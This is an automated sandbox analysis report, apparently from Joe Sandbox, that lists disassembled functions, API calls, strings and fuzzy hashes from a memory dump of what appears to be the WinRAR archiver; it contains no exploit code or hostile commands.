Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
Instruction Fuzzy Hash: A541F871B29A2292FE558B56F8145B96291BF34BD0F398539FD1DCB784EE3CE804A340

Function 00007FF60E62DC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF60E62DC47
_set_statfp.LIBCMT ref: 00007FF60E62DC62
_set_statfp.LIBCMT ref: 00007FF60E62DC7E
_set_statfp.LIBCMT ref: 00007FF60E62DCBA

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
Instruction ID: 1ea6f55d27af50b7aa5f6a445b8f891780a4d7e7cd0157aa93dad983fd1032fd
Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
Instruction Fuzzy Hash: 98115176F7CE2306FA551524F4863B911456F753A0E34863CFA6EC66D6CEACAC807242

Function 00007FF60E5E6FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60E5E7176
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60E5E7221

Strings

%c%c%c%c%c%c%c, xrefs: 00007FF60E5E71E3
%c%c%c%c%c%c%c%c%c, xrefs: 00007FF60E5E716F

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: swprintf
String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
API String ID: 233258989-622958660
Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
Instruction ID: ac02c8d22ddc4d0f7781c752995087097fc057e7659bf739d815d3be928baa85
Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
Instruction Fuzzy Hash: 72515BF3F386548AE3598F1CF881BA92690F374B90F545A25F94AD3B44DA3DDA448B00

Function 00007FF60E5D6E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

wcschr.LIBVCRUNTIME ref: 00007FF60E5D6EC8
wcschr.LIBVCRUNTIME ref: 00007FF60E5D6F16

Strings

MCAOmcao, xrefs: 00007FF60E5D6F0F
MCAOmcao, xrefs: 00007FF60E5D6EC1

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: wcschr
String ID: MCAOmcao$MCAOmcao
API String ID: 1497570035-1725859250
Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
Instruction ID: 214a8364a2de58a1d469ca50b03e4899e940ee0c066e107147742b83d88b4b25
Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
Instruction Fuzzy Hash: D241D616D0C9B380F6329B20916157E5651EF34B84F784832FA1DC62DAEE7FF4929721

Function 00007FF60E612984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF60E612B96
_CxxThrowException.LIBVCRUNTIME ref: 00007FF60E612BA7

Part of subcall function 00007FF60E61BA34: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF60E61B313), ref: 00007FF60E61BAB1
Part of subcall function 00007FF60E61BA34: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF60E61B313), ref: 00007FF60E61BAF0

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF60E612BB2
_CxxThrowException.LIBVCRUNTIME ref: 00007FF60E612BC3

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
String ID:
API String ID: 904936192-0
Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
Instruction ID: bd3e7bc28edb244c77d3100ed7ddf4eea7c7943c6042d4ad036d1408e4598b14
Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
Instruction Fuzzy Hash: 3E512362A29A9181EB01CF25E4603AD73A1FB94B98F188231FF5E877A5DF3DD141D300

Function 00007FF60E625120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF60E625173
WideCharToMultiByte.KERNEL32 ref: 00007FF60E625245
GetLastError.KERNEL32 ref: 00007FF60E625268
_invalid_parameter_noinfo.LIBCMT ref: 00007FF60E62529A

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
Instruction ID: 74f50ecd4d948f101446ab9d386de1d61ecb8f2a78f036088f7123212a37d402
Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
Instruction Fuzzy Hash: 1741B82192DB6246FB758B50B048379A691EF70B90F344138FE5E86AC5CF3CDC41A702

Function 00007FF60E5DD048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00007FF60E5C86CB,?,?,?,00007FF60E5CA5CB,?,?,00000000,?,?,00000040,?,?,00007FF60E5C2DF9), ref: 00007FF60E5DD09D
CreateFileW.KERNEL32(?,00007FF60E5C86CB,?,?,?,00007FF60E5CA5CB,?,?,00000000,?,?,00000040,?,?,00007FF60E5C2DF9), ref: 00007FF60E5DD0E5
CreateFileW.KERNEL32(?,00007FF60E5C86CB,?,?,?,00007FF60E5CA5CB,?,?,00000000,?,?,00000040,?,?,00007FF60E5C2DF9), ref: 00007FF60E5DD114
CreateFileW.KERNEL32(?,00007FF60E5C86CB,?,?,?,00007FF60E5CA5CB,?,?,00000000,?,?,00000040,?,?,00007FF60E5C2DF9), ref: 00007FF60E5DD15C

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
Instruction ID: b6f743e9b413aa81ef0abe656ba455fcd84226c9d6061da086a9edd6dc22c0b1
Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
Instruction Fuzzy Hash: AC316F32618B5582E7608F51F5547AA77A1F799BB8F604329FAAC47BC8CF3DD0448B40

Function 00007FF60E5FCFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF60E60B6D0: Sleep.KERNEL32(?,?,?,?,00007FF60E5DCBED,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E60B730

new.LIBCMT ref: 00007FF60E5FCFD9

Strings

rev, xrefs: 00007FF60E5FD00F
rar, xrefs: 00007FF60E5FD074

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Sleep
String ID: rar$rev
API String ID: 3472027048-2145959568
Opcode ID: 97d5eeffa8c4d2296c887cd490566290d1f91d5c51c78274d64fe8ea8adf1f36
Instruction ID: 95c74d3c1bcc7ced7263d7b988900195d07314c8e9ef58c91b48c9983d927988
Opcode Fuzzy Hash: 97d5eeffa8c4d2296c887cd490566290d1f91d5c51c78274d64fe8ea8adf1f36
Instruction Fuzzy Hash: A9A1E122A496A281EF16DB20D1643BD6375FF64784F654831FA5D876C6EF2EE540C340

Function 00007FF60E625CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF60E625D17

Strings

gfff, xrefs: 00007FF60E625E42
e+000, xrefs: 00007FF60E625DBF

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
Instruction ID: c700a56ff57613fd3a9616979f08b1d5f97d57d9a2f036e241073e00dbbbdb62
Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
Instruction Fuzzy Hash: 57512862B28BD146E7358B35A8403696A91EB70B90F18D235F6ADC7BD5CF2CD8449701

Function 00007FF60E607C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,00007FF60E607471), ref: 00007FF60E607C96
wcsstr.LIBVCRUNTIME ref: 00007FF60E607CBC

Strings

System Volume Information\, xrefs: 00007FF60E607CB2

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: AttributesFilewcsstr
String ID: System Volume Information\
API String ID: 1592324571-4227249723
Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
Instruction ID: 5c33f1f8b18d26acbbfd8f98a1fe2bb34214314c9c63a17f65e5763274487c5e
Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
Instruction Fuzzy Hash: CA312422A2D6A145FB91EB21F1602BE2B60AF65BC0F644431FE8D87796CE3CF4419700

Function 00007FF60E603C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60E603CB0

Strings

@%s, xrefs: 00007FF60E603C94
$%s, xrefs: 00007FF60E603C9D

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: snprintf
String ID: $%s$@%s
API String ID: 4288800496-834177443
Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
Instruction ID: 3ea9b55f593bedb1e1b7c837d2eb92737cbe0096fc462c48c7b9936c868fa2b6
Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
Instruction Fuzzy Hash: F331A072B29AB295EA50CF65F4407BA2760FB65788F600032FE0D97B99DE3DE505E700

Function 00007FF60E6049F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF60E604A7B
LoadStringW.USER32 ref: 00007FF60E604A94

Strings

Adding %-58s , xrefs: 00007FF60E604A16

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: LoadString
String ID: Adding %-58s
API String ID: 2948472770-2059140559
Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
Instruction ID: be3cbf6f8a5d99f1822a238a13740603979b48b26ebec37da2795c9ea56f4c8c
Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
Instruction Fuzzy Hash: 38118266B28B6185EB108F56F940069BBA1FFA4FD0F648539FE0CC3325EE3CE5019244

Function 00007FF60E5C5DB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60E5C5E1B
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60E5C5E2F

Strings

;%%0%du, xrefs: 00007FF60E5C5E0A

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: swprintf
String ID: ;%%0%du
API String ID: 233258989-2249936285
Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
Instruction ID: 234c91b444d2327d4f7c1a7830cc146bf9b65e1118bfb49f42583e6dff1afdd2
Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
Instruction Fuzzy Hash: 1A11C832B1869046E7219B64F4603E97360FBA8784F694531FB8C87795DE3CE545CB40

Function 00007FF60E60B974 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF60E60B97B
GetLastError.KERNEL32 ref: 00007FF60E60B986

Part of subcall function 00007FF60E5DCA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF60E5DCEDE

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF60E60B990

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ErrorExceptionLastObjectSingleThrowWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 564652978-2248577382
Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
